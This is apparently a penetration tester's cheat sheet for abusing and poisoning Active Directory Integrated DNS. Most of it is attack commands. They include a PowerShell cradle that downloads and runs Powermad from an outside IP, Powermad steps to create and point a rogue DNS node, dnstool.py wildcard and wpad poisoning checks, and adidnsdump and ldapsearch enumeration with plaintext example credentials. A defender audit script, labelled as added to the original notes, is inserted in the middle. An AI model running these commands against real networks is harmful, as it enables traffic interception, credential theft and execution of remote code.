ADIDNS Abuse
Active Directory Integrated DNS
0. Load Tools
PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1")
1. Check if You Can Modify (Add) AD DNS Names
PS > Get-ADIDNSZone -Credential $cred -Verbose
PS > Get-ADIDNSPermission -Credential $cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}
2. Create and Configure a New DNS Name
PS > New-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
PS > $dnsRecord = New-DNSRecordArray -Type A -Data 10.10.13.37
PS > Set-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Value $dnsRecord -Credential $cred -Verbose
PS > Enable-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
3. Check and Resolve the New DNS Object
PS > Get-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Credential $cred -Verbose
PS > Resolve-DNSName pc01
PS > cmd /c ping -n 1 pc01
4. Clean Up
PS > Remove-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
ADIDNS Poisoning (Wildcard Injection)
Check If You Can Perform the Attack
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r '*' --action query DC01.megacorp.local
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r 'wpad' --action query DC01.megacorp.local
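The Powermad permission check in step 1 and the wildcard/wpad query above both test the same two zone properties a defender wants to audit: whether Authenticated Users hold CreateChild on the zone container, and whether a '*' or 'wpad' node already exists. This added PowerShell audit is not part of the original notes; it assumes the RSAT ActiveDirectory and DnsServer modules, the zone name megacorp.local, and the DomainDnsZones container DN used by the ldapsearch query on this page.

```powershell
# Added defender-side audit (not from the original notes). Assumes RSAT ActiveDirectory
# and DnsServer modules are installed and the script runs as a DNS/domain admin.
Import-Module ActiveDirectory
Import-Module DnsServer

$zone   = 'megacorp.local'   # assumption: zone to audit
# Domain-scoped zone container, same DN layout as the ldapsearch query in these notes
$zoneDn = "DC=$zone,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local"

# 1. ACEs granting CreateChild to Authenticated Users are what let any domain user add a node
$acl = Get-Acl -Path "AD:\$zoneDn"
$weakAces = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $_.IdentityReference -eq 'NT AUTHORITY\Authenticated Users' -and
    $_.ActiveDirectoryRights -match 'CreateChild'
}
if ($weakAces) {
    Write-Warning "Authenticated Users can create DNS nodes in $zoneDn"
    $weakAces | Format-Table IdentityReference, ActiveDirectoryRights, InheritanceType -AutoSize
    # Remediation, to be run deliberately after review: drop the ACE(s) and write the ACL back.
    # $weakAces | ForEach-Object { $null = $acl.RemoveAccessRule($_) }
    # Set-Acl -Path "AD:\$zoneDn" -AclObject $acl
} else {
    Write-Output "No CreateChild ACE for Authenticated Users on $zoneDn"
}

# 2. A '*' or 'wpad' node owned by an admin cannot be created again by someone else,
#    so report whether each already exists and what it resolves to.
foreach ($name in '*', 'wpad') {
    $rec = Get-DnsServerResourceRecord -ZoneName $zone -Name $name -ErrorAction SilentlyContinue
    if ($rec) {
        $data = ($rec.RecordData | ForEach-Object { $_.IPv4Address }) -join ', '
        Write-Output "'$name' record present in $zone -> $data"
    } else {
        Write-Output "'$name' record absent in $zone (creatable by anyone holding CreateChild)"
    }
}
```

Review any '*' record it reports against change records: a wildcard that nobody provisioned is the artefact of the injection described in this section.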
Tools
adidnsdump
$ adidnsdump -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.megacorp.local -r [--dcfilter]
$ mv records.csv ~/ws/enum/adidns.csv
Check with ldapsearch
$ ldapsearch -H ldap://10.10.13.37:389 -x -D 'CN=snovvcrash,CN=Users,DC=megacorp,DC=local' -w 'Passw0rd!' -s sub -b 'DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local' '(objectClass=*)' dnsRecord dNSTombstoned name
Dump Records from a Child Domain
# Will dump records from DC=megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local --zone megacorp.local --forest -r
# Will attempt to dump records from DC=child.megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=child,DC=megacorp,DC=local (and may fail)
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local -r
Merge IPs into /24 CIDRs with Python
#!/usr/bin/env python3
"""
Merge standalone IPs into /24 CIDRs.
Example:
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' > ip.lst
$ cidr_merge.py | sort -u -t'.' -k1,1n -k2,2n -k3,3n -k4,4n | grep -e '^192' -e '^172' -e '^10'
"""
import netaddr

iplst = []
with open('ip.lst', 'r') as fd:
    for line in fd:
        ip = line.rstrip('\n')
        try:
            # Widen each address to its /24 so hosts on the same subnet collapse into one network
            iplst.append(netaddr.IPNetwork(f'{ip}/24'))
        except (netaddr.AddrFormatError, ValueError):
            # Skip values that are not IPv4 addresses (CSV header, empty lines, names without data)
            continue

# cidr_merge() drops duplicates and joins adjacent /24s into the smallest covering set
for cidr in netaddr.cidr_merge(iplst):
    print(cidr)